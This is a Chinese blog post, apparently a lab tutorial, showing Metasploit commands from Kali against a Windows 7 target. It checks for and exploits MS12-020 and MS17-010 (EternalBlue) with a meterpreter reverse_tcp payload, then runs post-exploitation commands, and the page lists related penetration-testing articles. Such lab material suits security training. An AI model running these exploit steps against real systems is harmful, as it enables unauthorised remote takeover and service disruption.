Metesploit工具使用

最新推荐文章于 2024-06-20 13:25:26 发布
最新推荐文章于 2024-06-20 13:25:26 发布
阅读量1k 收藏 6
点赞数 2
分类专栏: 漏洞工具 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Z_l123/article/details/122478016
版权

操作机:

kali

靶机:

windows 7

永恒之蓝

1.打开kali,进入终端界面

2.启动Metasploit

msfdb init && msfconsole

3.检测靶机是否存在ms12-020漏洞

1)输入以下命令查找ms12-020相关模块

search ms12-020

 2)使用ms12_020_check模块对目标进行漏洞检测

use 1          //使用ms12_020_check模块
show options   //查看该模块需要哪些参数
set rhosts   靶机ip   //设置目标ip地址
run            // 执行

 4.利用ms12-020漏洞对靶机进行攻击

use 0         //使用ms12_020_maxchannelids模块
show options   //查看该模块需要哪些参数
set rhosts   靶机ip   //设置目标ip地址
run            // 执行

 

 查看windows 7

 溢出攻击

1.启动Metasploit

msfdb init && msfconsole

 2.检测靶机是否存在ms17-010漏洞

1)输入以下命令查找ms17-010相关模块

search ms17-010

2)使用auxiliary/scanner/smb/smb_ms17_010 模块对目标进行漏洞检测

use 1          //使用smb_ms17_010 模块
show options   //查看该模块需要哪些参数
set rhosts   靶机ip   //设置目标ip地址
run            // 执行

 3.利用ms17-010漏洞对靶机进行溢出攻击

use 3         //使用ms17_010_eternalblue模块
show options   //查看该模块需要哪些参数
set rhosts   靶机ip   //设置目标ip地址
set lhost   操作机ip   // 设置本地ip地址
set payload windows/x64/meterpreter/reverse_tcp  //使用payload
set rport 445   //设置目标端口
set target 0       //设置目标操作系统类型(自动识别)
run            // 执行

 4.后渗透模块meterpreter的使用

pwd       //打印当前工作目录
sysinfo   //查看系统信息

 

 

Z_l123
关注
专栏目录
metasploit framework(2)
qq_37027540的博客
08-06 183
Metesploit(2) Expoit模块 Active exploit主动发送漏洞触发代码 Passive exploit利用客户端软件连接服务器端下载漏洞执行代码 Active exploit实例:使用exploit/windows/smb/psexec漏洞控制一台win7电脑,需要关闭win7的防火墙,并且需要知道win7电脑上的一个账号。 * 设置一下excploit目标的主机ip和...
安全测试工具Metasploit与漏洞扫描(上)
热门推荐
Maggie97的博客
12-03 1万+
一、漏洞及漏洞发掘方法   漏洞,是指在硬件、软件、协议实现或系统安全策略上存在缺陷,攻击者能够在未授权的情况下对系统进行访问或破坏。它会成为入侵者侵入系统和植入恶意软件的入口,影响系统用户的切身利益。漏洞与目标系统的操作系统版本、软件版本以及服务设置密切相关。研究漏洞必须要了解当前计算机系统及其安全问题的最新发展动态。常见的漏洞包括缓冲区溢出漏洞、跨站脚本漏洞(XSS)、SQL注入漏洞、数据库漏洞以及WEB应用漏洞等。   常见的漏洞发掘方法分为以下几种。   ·黑盒攻击(Fuzzing):即通过注入..
metesploit工具使用
m0_64338211的博客
01-13 459
1.启动Metasploit 2. 查找MS17-010(永恒之蓝)相关利用代码 3.使用ms17_010_eternalblue模块对目标机进行漏洞检测,以确认目标机存在ms17_010漏洞 use exploit/windows/smb/ms17_010_eternalblue //使用ms17_010_eternalblue模块 show options //查看该模块需要的参数 set RHOSTS 目标IP //设置目标机的IP地址 run...
Metasploit使用教程(操作实例,meterpreter,msfconsole,msfcli,抓包)
qq_44111753的博客
12-13 6335
1、控制Metasploit终端(MSFCONSOLE) MSFCONSOLE主要用于管理Metasploit数据库,管理会话,配置并启动Matasploit模块 一些通用命令: help:该命令允许用户查看执行命令的帮助信息 use module:该命令允许用户加载选择的模块 set optionname module:该命令允许用户为模块设置不同的选项。 run:该命令用来启动一个非渗透攻击模块 search module:该命令允许用户搜索一个特定的模块 exit:退出MSFCONSOLE 操作步骤:
有了这个网络安全面试题,面试就像开了挂!(附PDF)
lvaolan的博客
02-26 1126
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!​​​​内容实在太多,不一一截图了。
【P3】最强渗透工具 - metasploit(安装配置及使用教程详解)
qq_45138120的博客
06-23 1万+
包括 metasploit 是什么?、metasploit 攻击 windows 操作系统、metasploit 攻击永恒之蓝全流程、使用 Kali 渗透工具生成远控木马、metasploit 攻击示例、msfvenom 绕过杀毒软件技巧之捆绑木马、msfvenom 绕过杀毒软件技巧之加壳、windows 下安装 Themida、Themida 使用教程。
渗透测试-认识Metesploit.pdf
02-25
随着网络环境的日益复杂,对渗透测试人员的要求也越来越高,不仅要掌握多种工具使用,还要具备良好的安全分析能力以及对系统漏洞深入了解的能力。通过不断的学习和实践,渗透测试人员可以熟练地使用Metasploit这类...
基于笑脸漏洞的靶机渗透
qq_56472016的博客
11-03 683
一 打开我们的kali虚拟机,并打开我们的被渗透的靶机。 二 我们在虚拟机上登录后用ifconfig指令查看靶机的ip地址 得到的地址为192.168.159.129. 三 在kali上打开一个终端,用su root指令后输入root的登录密码,进入root模式,方便我们运用一些指令。 四 我们使用nmap指令,查看靶机的端口开放情况 我们发现靶机的21端口是打开的,再使用nmap -p 查看靶机的6200端口,发现6200端口是关闭的。 五 这时...
MetaSploit对cve-2019-0708进行检测及复现
不可言传的博客
07-09 1605
准备 一个没有安装KB4499175的Windows service 2003、2008、2012,Windows xp 、Windows 7等系统 我这里准备的是一个Windows 7系统 IP地址:192.168.126.130 攻击机:kali2 ip地址:192.168.126.129 第一步启动MetaSploit root@kali:~# service postgresql start 进入MetaSploit root@kali:~# msfconsole 第二步查找攻击
更新Kali的Metasploit框架,这些过程千万不要踩雷
weixin_59086772的博客
02-24 4188
本篇文章为大家分享在更新kali的Metasploit框架过程中容易踩的坑,已帮各位实践,下次更新时可避免。 Kali就不做过多介绍了,初学者一般都知道它的作用,就简单介绍Metasploit是一款免费可下载的框架,通过它可以很容易地获取开发并针对软件漏洞尝试攻击,它本身附带数千个已知软件漏洞的专业级漏洞攻击工具。 前言 不想升级一整个kali,就想把MSF框架更新一下,从版本5更新到把版本6 好家伙,不更新不知道,一更新直接呆住了,时间长不说还繁琐。 apt install metasploit
Metasploit介绍
千寻的博客
02-18 2400
文章目录Metasploit的介绍MSF中exploit模块漏洞利用exploit攻击载荷(payload)Metasploit中的 Payload 模块Meterpreter摘抄 Metasploit的介绍 MetasploitFramework(MSF)是一款开源安全漏洞检测工具,附带数千个已知的软件漏洞,并保持持续更新 Metasploit可以用来信息收集、漏洞探测、漏洞利用等渗透测试的全流程,被安全社区冠以“可以黑掉整个宇宙”之名。 刚开始的Metasploit是采用Perl语言编写的,但是再后来
metasploit的安装--winows环境
最小公倍数的博客
10-25 8552
1、下载适用于win的.exe文件,双击即可安装; 下载地址:http://downloads.metasploit.com/data/releases/metasploit-latest-windows-installer.exe 2、安装步骤 (1)双击.exe文件,进入安装; (2)勾选同意协议; (3)选择安装路径,我是选择在D盘,C盘东西太多; (4)接着出现下面...
Metasploit渗透基础(利用kali 自带工具Metasploit进行渗透测试)
最新发布
m0_65033889的博客
06-20 1445
Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。(了解POC/EXP概念)Metasploit 框架是可以添加漏洞代码片段,就好比一个军火库,它里面有各种武器供我使用,当然也有新的武器被研发出来,放到武器库里面后,我也可以使用,这就是框架的好处,新的攻击代码可以比较容易的加入 MSF框架供大家使用
Metaspoilt对(永恒之蓝)ms17-010的复现检测
cj_Hydra's Blog
02-18 523
前言: MS17-010是一个安全类型的补丁,MS17-010更新修复了 Microsoft Windows中的漏洞。 如果攻击者向Microsoft 服务器消息块 1.0 (SMBv1) 服务器发送经特殊设计的消息,则其中最严重的漏洞可能允许远程代码执行。2017年,The Shadow Brokers决定公开一部分有价值的工具,其中“eternalblue”(永恒之蓝)就是其中之一(漏洞编号m...
Metasploit技术(一)——Metasploit简介与基础
Phantom03167的博客
03-28 9551
Metasploit简介与基础
Metesploit使用随笔
weixin_30335353的博客
12-18 160
平时在工作中真正用到metesploit机会不多,偶尔也会用来做漏洞验证,但是每次使用的时候都需要花点时间回忆一下具体是怎么用的,因此索性记下来方便自己,以使用Nessus扫描YS的某个硬件设备发现的UPNP漏洞为例: 1、 查看漏洞的CVE号,比如Nessus会显示漏洞对应的CVE号,如图: 2、 根据CVE号到exploit_db站点(http://www.exploit...
白帽子学习——Metasploit渗透测试指南
weixin_43487532的博客
09-12 4875
黑客之渗透初学
Kubesploit:针对容器化环境的跨平台后渗透利用工具_merlin后渗透(1)
2301_82242326的博客
05-13 808
支持容器加载;支持sock;利用CVE-2019-5736漏洞攻击容器;扫描Kubernetes集群中的已知CVE漏洞;端口扫描,重点是Kubernetes服务;从容器内扫描Kubernetes服务;使用RCE扫描容器;扫描Pods和容器;扫描所有可用容器中的令牌;使用多个选项运行命令;
searchsploit简易用法
weixin_45798727的博客
02-17 3842
searchsploit查找文件 查找程序,服务漏洞 searchsploit 程序名 使用searchsploit提供的文档/文件 searchsploit文档/文件的目录在 数据库目录/usr/share/exploitdb/ 加上文件的目录 除了直接输入路径访问文件 还可以使用 searchsploit -m 文档名 将文件复制到当前目录 复制到当前目录可以使用 ”cat 文档名“ 查看 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值